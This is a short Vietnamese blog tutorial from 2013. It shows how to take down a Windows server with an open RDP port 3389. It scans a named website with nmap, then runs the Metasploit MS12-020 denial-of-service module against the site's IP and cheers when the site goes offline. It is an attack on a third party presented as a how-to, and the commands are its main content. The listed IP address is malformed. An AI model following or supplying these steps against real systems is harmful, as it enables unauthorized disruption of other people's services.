Thứ Tư, 13 tháng 3, 2013

DDOS server open port 3389 dùng Backtrack

Hôm nay capuchino lượn lờ trong vhb thấy có bài http://vhbsystem.net/@4rum/showthread.php?1108-Send-Socket-Window-Qua-Port-Remote-3389&p=6090
thấy trong bài có vài victim mở port 3389,nên nhân tiện capuchino viết tutorial ddos server mở port này.
đầu tiên để kiểm tra victim có mở port này ko,chúng ta dùng nmap để scan nhé.
victim demo ở đây là mugiaitri.netscan bằng nmap nhé
nmap -v -A mugiaitri.net

kết quả ta thấy nó mở port 3389 nhé.
xong rồi tiếp tục nào
mở một terminal khác lên,rồi mở msfconsole lên nhé
type:msfconsole
type:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
rồi tiếp tục set remote host và remote port như sau
set RHOST 210.211.125.1222
ip ở đây là ip victim ý,lúc scan bằng nmap nó hiện luôn ra kìa.
set RPORT 3389
đây là port remote
xong rồi exploit nhé

Xem kết quả ta nhận đc gì nào

nó báo seems down rùi nhé :v
tiếp tục vào site nó xem có đc ko.


xong nhé,e nó đã die rồi kìa :v .
Tut by capuchino.


Không có nhận xét nào:

Đăng nhận xét